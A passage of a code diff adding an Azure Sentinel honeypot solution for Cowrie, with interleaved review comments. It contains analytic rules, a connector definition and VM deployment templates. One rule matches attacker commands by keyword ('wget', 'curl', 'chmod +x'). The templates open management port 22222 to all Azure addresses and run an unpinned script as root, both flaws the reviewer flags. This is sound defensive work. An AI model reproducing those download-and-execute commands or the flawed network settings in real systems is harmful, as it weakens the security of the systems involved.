@@ -0,0 +1,37 @@ +id: b86b27e3-adb9-4f39-8c4e-0b7300031984 +name: Detect Suspicious File Downloads +description: | + 'Identify instances where files were downloaded from suspicious or known malicious URLs.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - LateralMovement +relevantTechniques: + - T0843 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend URL = tostring(parse_json(RawData).url) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | where EventID == "cowrie.session.file_download" + | where URL contains "malicious-site.com" or URL contains "suspicious" + | project SourceIP, URL +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP + - entityType: URL + fieldMappings: + - identifier: Url + columnName: URL +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Analytic Rules/MonitorUnusualFileExecution.yaml b/Solutions/Sensor SSH Cowrie/Analytic Rules/MonitorUnusualFileExecution.yaml new file mode 100644 index 00000000000..0d9403b563b --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Analytic Rules/MonitorUnusualFileExecution.yaml 
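Review bot: The only filter is `URL contains "malicious-site.com" or URL contains "suspicious"`, which are placeholder strings rather than indicators, so on real traffic this rule will almost never fire; the "known malicious" part of the description is better served by a lookup than by literals. One option is to join the download URL against the workspace's threat-intelligence indicators (assuming a TI connector populates `ThreatIntelligenceIndicator`), another is a watchlist via `_GetWatchlist()`; either way the literal list should go, and on a honeypot it may be simpler still to alert on every `cowrie.session.file_download` and enrich with TI where it matches.
```yaml
query: |
  // … unchanged: extend EventID / URL / SourceIP …
  | where EventID == "cowrie.session.file_download" and isnotempty(URL)
  | join kind=inner (
      ThreatIntelligenceIndicator
      | where Active == true and isnotempty(Url)
      | project IndicatorUrl = Url, ConfidenceScore, ThreatType
    ) on $left.URL == $right.IndicatorUrl
  | project SourceIP, URL, ConfidenceScore, ThreatType
```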
@@ -0,0 +1,33 @@ +id: f72805a7-b8c5-45fb-aacf-d0db7e0bf49b +name: Monitor Unusual File Execution +description: | + 'Detect attempts to execute files or scripts that are unusual or not typical for the environment.' +severity: Medium +status: Available +requiredDataConnectors: + - connectorId: SensorSSHCowrie + dataTypes: + - newCowrie_CL +queryFrequency: 5m +queryPeriod: 5m +triggerOperator: gt +triggerThreshold: 0 +tactics: + - Execution +relevantTechniques: + - T1204 +query: | + newCowrie_CL + | extend EventID = tostring(parse_json(RawData).eventid) + | extend Command = tostring(parse_json(RawData).command) + | extend SourceIP = tostring(parse_json(RawData).src_ip) + | where EventID == "cowrie.session.command" + | where Command contains "wget" or Command contains "curl" or Command contains "chmod +x" + | project SourceIP, Command +entityMappings: + - entityType: IP + fieldMappings: + - identifier: Address + columnName: SourceIP +version: 1.0.1 +kind: Scheduled \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Data Connectors/Microsoft-SSHCowrieSensor.json b/Solutions/Sensor SSH Cowrie/Data Connectors/Microsoft-SSHCowrieSensor.json new file mode 100644 index 00000000000..272f0a238e2 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Data Connectors/Microsoft-SSHCowrieSensor.json 
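Review bot: The filter `EventID == "cowrie.session.command"` matches no event id in the sample data of this commit, and Cowrie's documented event for an executed command is `cowrie.command.input` (with `cowrie.command.failed` / `cowrie.command.success` for the outcome), so as written the rule would likely never fire; verify the id against a live log before shipping. The keyword test `Command contains "wget" or Command contains "curl" or Command contains "chmod +x"` is a reasonable seed list, but `contains` matches any substring, so switching the single-word terms to token matching — `| where Command has_any ("wget", "curl") or Command contains "chmod +x"` — will cut noise once real input flows. Execution / T1204 (User Execution) implies a victim user ran something; for attacker-typed shell commands on a sensor, T1059 is the closer fit.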
@@ -0,0 +1,108 @@ +{ + "id": "MicrosoftSSHCowrieSensor", + "title": "Microsoft SSH Cowrie Sensor", + "publisher": "Microsoft", + "descriptionMarkdown": "The Sensor SSH Cowrie data connector provides the capability to deploy a Linux based Azure VM host with Cowrie setup and configured. Included with CustomTable, AMA, DCR, DCE ready to go and ingesting Cowrie events on host. You can deploy this as a internal / private sensor (HoneyPot) on your existing virtual netwrk and subnet acting as a tripwire and can use the detection rules. Alternatively you can deploy sensor (HoneyPot) publically on the Internet and collect threat inetellegnce. This connector provides Microsoft Sentinel the capability to view dashboards, create custom alerts, collect Threat Intellegence.", + "additionalRequirementBanner": "This data connector depends on a parser based on Kusto Function to work as expected. Follow the steps to use this Kusto Function alias **** in queries and workbooks. [Follow steps to get this Kusto Function>]() ", + "graphQueries": [ + { + "metricName": "Total data received", + "legend": "newCowrie_CL", + "baseQuery": "newCowrie_CL" + } + ], + "sampleQueries": [ + { + "description" : "Top 10 Cowrie Events detected", + "query": "newCowrie_CL\n | extend Message = tostring(parse_json(RawData).message)\n | summarize count() by Message\n | top 10 by count_" + } + ], + "dataTypes": [ + { + "name": "newCowrie_CL", + "lastDataReceivedQuery": "newCowrie_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + } + ], + "connectivityCriterias": [ + { + "type": "IsConnectedQuery", + "value": [ + "newCowrie_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)" + ] + } + ], + "availability": { + "status": 1, + "isPreview": true + }, + "permissions": { + "resourceProvider": [ + { + "provider": "Microsoft.OperationalInsights/workspaces", + "permissionsDisplayText": "read and write permissions on the workspace are 
required.", + "providerDisplayName": "Workspace", + "scope": "Workspace", + "requiredPermissions": { + "write": true, + "read": true, + "delete": true + } + }, + { + "provider": "Microsoft.OperationalInsights/workspaces/sharedKeys", + "permissionsDisplayText": "read permissions to shared keys for the workspace are required. [See the documentation to learn more about workspace keys](https://docs.microsoft.com/azure/azure-monitor/platform/agent-windows#obtain-workspace-id-and-key).", + "providerDisplayName": "Keys", + "scope": "Workspace", + "requiredPermissions": { + "action": true + } + } + ], + "customs": [ + { + "name": "Microsoft.Web/sites permissions", + "description": "Read and write permissions to Azure Functions to create a Function App is required. [See the documentation to learn more about Azure Functions](https://docs.microsoft.com/azure/azure-functions/)." + }, + { + "name": "Custom prerequisites if necessary, otherwise delete this customs tag", + "description": "Description for any custom pre-requisites" + } + ] + }, + "instructionSteps": [ + { + "title": "", + "description": ">**NOTE:** This connector deploys a Debian Azure VM, Cowrie software, CustomTable, AMA, DCR, DCE, uses AMA to pull Cowrie JSON logs into Microsoft Sentinel. This might result in additional data ingestion costs." + }, + { + "title": "Option 1 - Private - Azure Resource Manager (ARM) Template", + "description": "Use this method for automated deployment of the Cowrie VM using an ARM Tempate.\n\n1. Click the **Deploy to Azure** button below. \n\n\t[![Deploy To Azure](https://aka.ms/deploytoazurebutton)](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Solutions/Sensor%2520SSH%2520Cowrie/Package/azuredeployprivate.json)\n2. Mark the checkbox labeled **I agree to the terms and conditions stated above**. \n3. Click **Purchase** to deploy." 
+ }, + { + "title": "Option 2 - Public - Azure Resource Manager (ARM) Template", + "description": "Use this method for automated deployment of the Cowrie VM using an ARM Tempate.\n\n1. Click the **Deploy to Azure** button below. \n\n\t[![Deploy To Azure](https://aka.ms/deploytoazurebutton)](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Solutions/Sensor%2520SSH%2520Cowrie/Package/azuredeploypublic.json)\n2. Mark the checkbox labeled **I agree to the terms and conditions stated above**. \n3. Click **Purchase** to deploy." + }, + { + "title": "", + "description": "**Post Deployment**\n\n1. From the Azure Portal, navigate to the data collection rule cowrie-dcr, click on resources, you will see your VM with a data collection rule associated, Next you must associate Data Collection Endpoint (DCE) cowrie-dce and press Save." + } + ], + "metadata": { + "id": "d4a44059-a0d1-4e76-a8c5-535d381c0872", + "version": "1.0.0", + "kind": "dataConnector", + "source": { + "kind": "Solution", + "name": "Sensore SSH Cowrie" + }, + "author": { + "name": "Microsoft" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } +} \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Package/azuredeployprivate.json b/Solutions/Sensor SSH Cowrie/Package/azuredeployprivate.json new file mode 100644 index 00000000000..a681c653e85 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Package/azuredeployprivate.json 
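Review bot: The connector definition still carries template placeholders that will be rendered to users: `additionalRequirementBanner` advertises a Kusto Function with an empty alias (`****`) and an empty link target while every analytic rule in this commit queries `newCowrie_CL` directly, so either the banner goes or the parser it refers to is added; and the second `customs` entry (`"Custom prerequisites if necessary, otherwise delete this customs tag"`) is the scaffold text itself. The permissions block requests `Microsoft.Web/sites` (Azure Functions) and workspace `sharedKeys`, neither of which the described VM + AMA/DCR/DCE pipeline appears to use — trimming them keeps the requested rights to what the deployment needs. The two Deploy-to-Azure buttons link straight to raw.githubusercontent.com with a double-encoded path (`Sensor%2520SSH%2520Cowrie`), which only decodes correctly when embedded in the portal's custom-deployment URI; check that the link actually resolves. Finally, `metadata.source.name` is `Sensore SSH Cowrie` while the solution folder is `Sensor SSH Cowrie`, and the description has several typos (netwrk, publically, inetellegnce, Intellegence, Tempate) worth fixing before publication.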
@@ -0,0 +1,439 @@ +{ + "$schema": "https://schema.management.azure.com/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "adminUsername": { + "type": "String", + "metadata": { + "description": "Admin username for the VM" + } + }, + "adminPassword": { + "type": "SecureString", + "metadata": { + "description": "Admin password for the VM" + } + }, + "vmName": { + "defaultValue": "bastion-01", + "type": "String", + "metadata": { + "description": "Name of the virtual machine, bastion-01, cups-01, customerland-lamp-01" + } + }, + "virtualNetworkName": { + "type": "string", + "defaultValue": "VNETNAME", + "metadata": { + "description": "Name of the existing VNET" + } + }, + "virtualNetworkResourceGroup": { + "type": "string", + "defaultValue": "VNETRESOURCEGROUPNAME", + "metadata": { + "description": "Name of the existing VNET resource group" + } + }, + "subnetName": { + "type": "string", + "defaultValue": "SUBNETNAME", + "metadata": { + "description": "Name of the subnet in the virtual network you want to use" + } + }, + "IpMgmtAllow": { + "defaultValue": "xx.xx.xx.xx/32", + "type": "String", + "metadata": { + "description": "The Ip Address that is allowed to connect over port 22222 SSH Mgmt Plane" + } + }, + "resourceGroupNameofWorkspace": { + "defaultValue": "RGNAMEFORLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Azure ResourceGroup name of the existing Sentinel or Log Analytics workspace" + } + }, + "SubscriptionIDofWorkspace": { + "defaultValue": "AZURESUBGUIDFORLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Azure SubscriptionID of the existing Sentinel or Log Analytics workspace" + } + }, + "workspaceName": { + "defaultValue": "NAMEOFLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Sentinel or Log Analytics workspace name" + } + }, + "customTableName": { + "defaultValue": "newCowrie_CL", + "type": "String", + "metadata": { + 
"description": "Name of the custom table for Honeypot events" + } + }, + "scriptUrl": { + "defaultValue": "https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Solutions/Sensor%2520SSH%2520Cowrie/Scripts/script.sh", + "type": "String", + "metadata": { + "description": "URL of script to execute" + } + }, + "scriptFileName": { + "defaultValue": "script.sh", + "type": "String", + "metadata": { + "description": "Name of script to execute" + } + } + }, + "variables": { + "location": "[resourceGroup().location]", + "workspaceId": "[resourceId(parameters('resourceGroupNameofWorkspace'), 'Microsoft.OperationalInsights/workspaces', parameters('workspaceName'))]", + "subnetRef": "[resourceId(parameters('virtualNetworkResourceGroup'), 'Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]", + "dcrName": "cowrie-dcr", + "dceName": "cowrie-dce", + "vmSize": "Standard_D2s_v3", + "imagePublisher": "Debian", + "imageOffer": "debian-11", + "imageSku": "11-gen2", + "nicName": "[concat(parameters('vmName'), '-nic')]", + "osDiskName": "[concat(parameters('vmName'), '-osDisk')]" + }, + "resources": [ + { + "type": "Microsoft.Network/networkSecurityGroups", + "apiVersion": "2020-11-01", + "name": "myNSG", + "location": "[resourceGroup().location]", + "properties": { + "securityRules": [ + { + "name": "AllowSSH", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22", + "sourceAddressPrefix": "*", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1000, + "direction": "Inbound" + } + }, + { + "name": "AllowTelnet", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "23", + "sourceAddressPrefix": "*", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1010, + "direction": "Inbound" + } + }, + { + "name": "AllowTagCustom22222Inbound", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + 
"destinationPortRange": "22222", + "sourceAddressPrefix": "AzureCloud", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1020, + "direction": "Inbound" + } + }, + { + "name": "AllowCidrBlockCustom22222Inbound", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22222", + "sourceAddressPrefix": "[parameters('IpMgmtAllow')]", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1030, + "direction": "Inbound", + "sourcePortRanges": [], + "destinationPortRanges": [], + "sourceAddressPrefixes": [], + "destinationAddressPrefixes": [] + } + } + ] + } + }, + { + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-05-01", + "name": "[variables('nicName')]", + "location": "[variables('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/networkSecurityGroups', 'myNSG')]" + ], + "properties": { + "ipConfigurations": [ + { + "name": "ipconfig1", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', 'myNSG')]" + } + } + }, + { + "type": "Microsoft.Compute/virtualMachines", + "apiVersion": "2021-07-01", + "name": "[parameters('vmName')]", + "location": "[variables('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]" + ], + "properties": { + "hardwareProfile": { + "vmSize": "[variables('vmSize')]" + }, + "storageProfile": { + "imageReference": { + "publisher": "[variables('imagePublisher')]", + "offer": "[variables('imageOffer')]", + "sku": "[variables('imageSku')]", + "version": "latest" + }, + "osDisk": { + "createOption": "FromImage", + "managedDisk": { + "storageAccountType": "Standard_LRS" + } + } + }, + "osProfile": { + "computerName": "[parameters('vmName')]", + "adminUsername": "[parameters('adminUsername')]", + "adminPassword": 
"[parameters('adminPassword')]" + }, + "networkProfile": { + "networkInterfaces": [ + { + "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]" + } + ] + } + } + }, + { + "type": "Microsoft.Compute/virtualMachines/extensions", + "apiVersion": "2021-11-01", + "name": "[format('{0}/AzureMonitorLinuxAgent', parameters('vmName'))]", + "location": "[resourceGroup().location]", + "dependsOn": [ + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "properties": { + "publisher": "Microsoft.Azure.Monitor", + "type": "AzureMonitorLinuxAgent", + "typeHandlerVersion": "1.21", + "autoUpgradeMinorVersion": true, + "enableAutomaticUpgrade": true + } + }, + { + "type": "Microsoft.Compute/virtualMachines/extensions", + "apiVersion": "2021-03-01", + "name": "[concat(parameters('vmName'), '/customScriptExtension')]", + "location": "[resourceGroup().location]", + "dependsOn": [ + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "properties": { + "publisher": "Microsoft.Azure.Extensions", + "type": "CustomScript", + "typeHandlerVersion": "2.1", + "autoUpgradeMinorVersion": true, + "settings": { + "fileUris": [ + "[parameters('scriptUrl')]" + ], + "commandToExecute": "[concat('bash ', parameters('scriptFileName'))]" + } + } + }, + { + "type": "Microsoft.Resources/deployments", + "apiVersion": "2021-04-01", + "name": "nestedTemplate", + "resourceGroup": "[parameters('resourceGroupNameofWorkspace')]", + "subscriptionId": "[parameters('SubscriptionIDofWorkspace')]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.OperationalInsights/workspaces/tables", + "apiVersion": "2022-10-01", + "name": "[concat(parameters('workspaceName'), '/', parameters('customTableName'))]", + "properties": { + 
"schema": { + "name": "[parameters('customTableName')]", + "columns": [ + { + "name": "TimeGenerated", + "type": "datetime" + }, + { + "name": "Timestamp", + "type": "datetime" + }, + { + "name": "RawData", + "type": "string" + }, + { + "name": "Message", + "type": "string" + }, + { + "name": "Severity", + "type": "string" + } + ], + "primaryKey": [ + "TimeGenerated" + ] + } + } + } + ] + }, + "parameters": {} + } + }, + { + "type": "Microsoft.Insights/dataCollectionEndpoints", + "apiVersion": "2023-03-11", + "name": "cowrie-dce", + "location": "[resourceGroup().location]", + "properties": { + "immutableId": "", + "configurationAccess": {}, + "logsIngestion": {}, + "metricsIngestion": {}, + "networkAcls": { + "publicNetworkAccess": "Enabled" + } + } + }, + { + "type": "Microsoft.Insights/dataCollectionRules", + "dependsOn": [ + "[resourceId('Microsoft.Insights/dataCollectionEndpoints', 'cowrie-dce')]" + ], + "apiVersion": "2022-06-01", + "name": "cowrie-dcr", + "location": "[resourceGroup().location]", + "identity": { + "type": "systemAssigned" + }, + "properties": { + "dataCollectionEndpointId": "[resourceId('Microsoft.Insights/dataCollectionEndpoints', 'cowrie-dce')]", + "dataFlows": [ + { + "destinations": [ + "MyDestination" + ], + "outputStream": "[concat('Custom-', parameters('customTableName'))]", + "streams": [ + "Custom-Text-cowrie_CL" + ], + "transformKql": "source" + } + ], + "dataSources": { + "logFiles": [ + { + "filePatterns": [ + "/home/cowrie/cowrie/var/log/cowrie/cowrie.json" + ], + "format": "text", + "name": "Custom-Text-cowrie_CL", + "settings": { + "text": { + "recordStartTimestampFormat": "ISO 8601" + } + }, + "streams": [ + "Custom-Text-cowrie_CL" + ] + } + ] + }, + "destinations": { + "logAnalytics": [ + { + "name": "MyDestination", + "workspaceResourceId": "[variables('workspaceId')]" + } + ] + }, + "streamDeclarations": { + "Custom-Text-cowrie_CL": { + "columns": [ + { + "name": "TimeGenerated", + "type": "datetime" + }, + { + "name": 
"Message", + "type": "string" + }, + { + "name": "RawData", + "type": "string" + } + ] + } + } + } + }, + { + "type": "Microsoft.Insights/dataCollectionRuleAssociations", + "dependsOn": [ + "[resourceId('Microsoft.Insights/dataCollectionRules', variables('dcrName'))]", + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "apiVersion": "2023-03-11", + "scope": "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]", + "name": "cowrie-dcr-assoc", + "location": "[resourceGroup().location]", + "properties": { + "dataCollectionRuleId": "[resourceId('Microsoft.Insights/dataCollectionRules', variables('dcrName'))]" + } + } + ], + "outputs": { + "adminUsername": { + "type": "String", + "value": "[parameters('adminUsername')]" + } + } + } \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Package/azuredeploypublic.json b/Solutions/Sensor SSH Cowrie/Package/azuredeploypublic.json new file mode 100644 index 00000000000..659e5484bea --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Package/azuredeploypublic.json 
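Review bot: The `AllowTagCustom22222Inbound` rule opens the management SSH port 22222 to the `AzureCloud` service tag, which covers every public Azure address in every tenant, so the `IpMgmtAllow` allow-list in the following `AllowCidrBlockCustom22222Inbound` rule is effectively bypassed; drop that rule, or set its `sourceAddressPrefix` to the specific jump host or narrower tag that is actually needed, so that only `[parameters('IpMgmtAllow')]` reaches 22222. The `scriptUrl` default `.../Solutions/Sensor%2520SSH%2520Cowrie/Scripts/script.sh` looks double-encoded (`%2520` decodes to a literal `%20`, not a space), so it will presumably 404 and fail the CustomScript extension; the createUiDefinition in this PR uses the single-encoded `Sensor%20SSH%20Cowrie` form. That script is also fetched from the moving `master` branch and executed as root at deploy time with no integrity check, so a later change to the repository changes what every new sensor runs; pin `fileUris` to an immutable commit URL and have the script verify a checksum of anything it downloads in turn. All three points apply unchanged to azuredeploypublic.json in the next hunk.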
@@ -0,0 +1,454 @@ +{ + "$schema": "https://schema.management.azure.com/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "adminUsername": { + "type": "String", + "metadata": { + "description": "Admin username for the VM" + } + }, + "adminPassword": { + "type": "SecureString", + "metadata": { + "description": "Admin password for the VM" + } + }, + "vmName": { + "defaultValue": "bastion-01", + "type": "String", + "metadata": { + "description": "Name of the virtual machine, bastion-01, cups-01, customerland-lamp-01" + } + }, + "IpMgmtAllow": { + "defaultValue": "xx.xx.xx.xx/32", + "type": "String", + "metadata": { + "description": "The Ip Address that is allowed to connect over port 22222 SSH Mgmt Plane" + } + }, + "resourceGroupNameofWorkspace": { + "defaultValue": "RGNAMEFORLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Azure ResourceGroup name of the existing Sentinel or Log Analytics workspace" + } + }, + "SubscriptionIDofWorkspace": { + "defaultValue": "AZURESUBGUIDFORLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Azure SubscriptionID of the existing Sentinel or Log Analytics workspace" + } + }, + "workspaceName": { + "defaultValue": "NAMEOFLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Sentinel or Log Analytics workspace name" + } + }, + "customTableName": { + "defaultValue": "newCowrie_CL", + "type": "String", + "metadata": { + "description": "Name of the custom table for Honeypot events" + } + }, + "scriptUrl": { + "defaultValue": "https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Solutions/Sensor%2520SSH%2520Cowrie/Scripts/script.sh", + "type": "String", + "metadata": { + "description": "URL of script to execute" + } + }, + "scriptFileName": { + "defaultValue": "script.sh", + "type": "String", + "metadata": { + "description": "Name of script to execute" + } + } + }, + "variables": { + "location": 
"[resourceGroup().location]", + "workspaceId": "[resourceId(parameters('resourceGroupNameofWorkspace'), 'Microsoft.OperationalInsights/workspaces', parameters('workspaceName'))]", + "vmSize": "Standard_D2s_v3", + "imagePublisher": "Debian", + "imageOffer": "debian-11", + "imageSku": "11-gen2", + "dcrName": "cowrie-dcr", + "dceName": "cowrie-dce", + "vnetName": "VNET-Sensor", + "subnetName": "default", + "nicName": "[concat(parameters('vmName'), '-nic')]", + "publicIPName": "[concat(parameters('vmName'), '-publicIP')]", + "osDiskName": "[concat(parameters('vmName'), '-osDisk')]" + }, + "resources": [ + { + "type": "Microsoft.Network/publicIPAddresses", + "apiVersion": "2021-05-01", + "name": "[variables('publicIPName')]", + "location": "[variables('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "type": "Microsoft.Network/networkSecurityGroups", + "apiVersion": "2020-11-01", + "name": "myNSG", + "location": "[resourceGroup().location]", + "properties": { + "securityRules": [ + { + "name": "AllowSSH", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22", + "sourceAddressPrefix": "*", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1000, + "direction": "Inbound" + } + }, + { + "name": "AllowTelnet", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "23", + "sourceAddressPrefix": "*", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1010, + "direction": "Inbound" + } + }, + { + "name": "AllowTagCustom22222Inbound", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22222", + "sourceAddressPrefix": "AzureCloud", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1020, + "direction": "Inbound" + } + }, + { + "name": "AllowCidrBlockCustom22222Inbound", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22222", 
+ "sourceAddressPrefix": "[parameters('IpMgmtAllow')]", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1030, + "direction": "Inbound", + "sourcePortRanges": [], + "destinationPortRanges": [], + "sourceAddressPrefixes": [], + "destinationAddressPrefixes": [] + } + } + ] + } + }, + { + "type": "Microsoft.Network/virtualNetworks", + "apiVersion": "2021-05-01", + "name": "[variables('vnetName')]", + "location": "[variables('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "10.0.0.0/16" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "10.0.0.0/24" + } + } + ] + } + }, + { + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-05-01", + "name": "[variables('nicName')]", + "location": "[variables('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', variables('vnetName'))]", + "[resourceId('Microsoft.Network/networkSecurityGroups', 'myNSG')]" + ], + "properties": { + "ipConfigurations": [ + { + "name": "ipconfig1", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnetName'))]" + }, + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPName'))]" + } + } + } + ], + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', 'myNSG')]" + } + } + }, + { + "type": "Microsoft.Compute/virtualMachines", + "apiVersion": "2021-07-01", + "name": "[parameters('vmName')]", + "location": "[variables('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]" + ], + "properties": { + "hardwareProfile": { + "vmSize": "[variables('vmSize')]" + }, + "storageProfile": { + "imageReference": { + "publisher": "[variables('imagePublisher')]", + "offer": "[variables('imageOffer')]", + "sku": 
"[variables('imageSku')]", + "version": "latest" + }, + "osDisk": { + "createOption": "FromImage", + "managedDisk": { + "storageAccountType": "Standard_LRS" + } + } + }, + "osProfile": { + "computerName": "[parameters('vmName')]", + "adminUsername": "[parameters('adminUsername')]", + "adminPassword": "[parameters('adminPassword')]" + }, + "networkProfile": { + "networkInterfaces": [ + { + "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]" + } + ] + } + } + }, + { + "type": "Microsoft.Compute/virtualMachines/extensions", + "apiVersion": "2021-11-01", + "name": "[format('{0}/AzureMonitorLinuxAgent', parameters('vmName'))]", + "location": "[resourceGroup().location]", + "dependsOn": [ + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "properties": { + "publisher": "Microsoft.Azure.Monitor", + "type": "AzureMonitorLinuxAgent", + "typeHandlerVersion": "1.21", + "autoUpgradeMinorVersion": true, + "enableAutomaticUpgrade": true + } + }, + { + "type": "Microsoft.Compute/virtualMachines/extensions", + "apiVersion": "2021-03-01", + "name": "[concat(parameters('vmName'), '/customScriptExtension')]", + "location": "[resourceGroup().location]", + "dependsOn": [ + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "properties": { + "publisher": "Microsoft.Azure.Extensions", + "type": "CustomScript", + "typeHandlerVersion": "2.1", + "autoUpgradeMinorVersion": true, + "settings": { + "fileUris": [ + "[parameters('scriptUrl')]" + ], + "commandToExecute": "[concat('bash ', parameters('scriptFileName'))]" + } + } + }, + { + "type": "Microsoft.Resources/deployments", + "apiVersion": "2021-04-01", + "name": "nestedTemplate", + "resourceGroup": "[parameters('resourceGroupNameofWorkspace')]", + "subscriptionId": "[parameters('SubscriptionIDofWorkspace')]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": 
"https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.OperationalInsights/workspaces/tables", + "apiVersion": "2022-10-01", + "name": "[concat(parameters('workspaceName'), '/', parameters('customTableName'))]", + "properties": { + "schema": { + "name": "[parameters('customTableName')]", + "columns": [ + { + "name": "TimeGenerated", + "type": "datetime" + }, + { + "name": "Timestamp", + "type": "datetime" + }, + { + "name": "RawData", + "type": "string" + }, + { + "name": "Message", + "type": "string" + }, + { + "name": "Severity", + "type": "string" + } + ], + "primaryKey": [ + "TimeGenerated" + ] + } + } + } + ] + }, + "parameters": {} + } + }, + { + "type": "Microsoft.Insights/dataCollectionEndpoints", + "apiVersion": "2023-03-11", + "name": "cowrie-dce", + "location": "[resourceGroup().location]", + "properties": { + "immutableId": "", + "configurationAccess": {}, + "logsIngestion": {}, + "metricsIngestion": {}, + "networkAcls": { + "publicNetworkAccess": "Enabled" + } + } + }, + { + "type": "Microsoft.Insights/dataCollectionRules", + "dependsOn": [ + "[resourceId('Microsoft.Insights/dataCollectionEndpoints', 'cowrie-dce')]" + ], + "apiVersion": "2022-06-01", + "name": "cowrie-dcr", + "location": "[resourceGroup().location]", + "identity": { + "type": "systemAssigned" + }, + "properties": { + "dataCollectionEndpointId": "[resourceId('Microsoft.Insights/dataCollectionEndpoints', 'cowrie-dce')]", + "dataFlows": [ + { + "destinations": [ + "MyDestination" + ], + "outputStream": "[concat('Custom-', parameters('customTableName'))]", + "streams": [ + "Custom-Text-cowrie_CL" + ], + "transformKql": "source" + } + ], + "dataSources": { + "logFiles": [ + { + "filePatterns": [ + "/home/cowrie/cowrie/var/log/cowrie/cowrie.json" + ], + "format": "text", + "name": "Custom-Text-cowrie_CL", + "settings": { + "text": { + 
